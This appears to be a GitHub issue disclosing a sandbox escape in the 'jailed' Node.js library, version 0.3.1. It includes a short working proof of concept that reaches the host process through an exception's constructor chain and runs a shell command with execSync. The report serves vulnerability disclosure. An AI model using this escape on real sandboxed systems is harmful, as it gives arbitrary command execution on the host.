Open seongil-wi opened 1 year ago
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.js
```js
var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);
```
test_case.js
```js
try {
    __defineGetter__("x", )
} catch (pp) {
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
application.disconnect();
```
The sandbox can be escaped by calling `__defineGetter__` or `__defineSetter__`. Also, we can execute arbitrary shell code using the `process` module.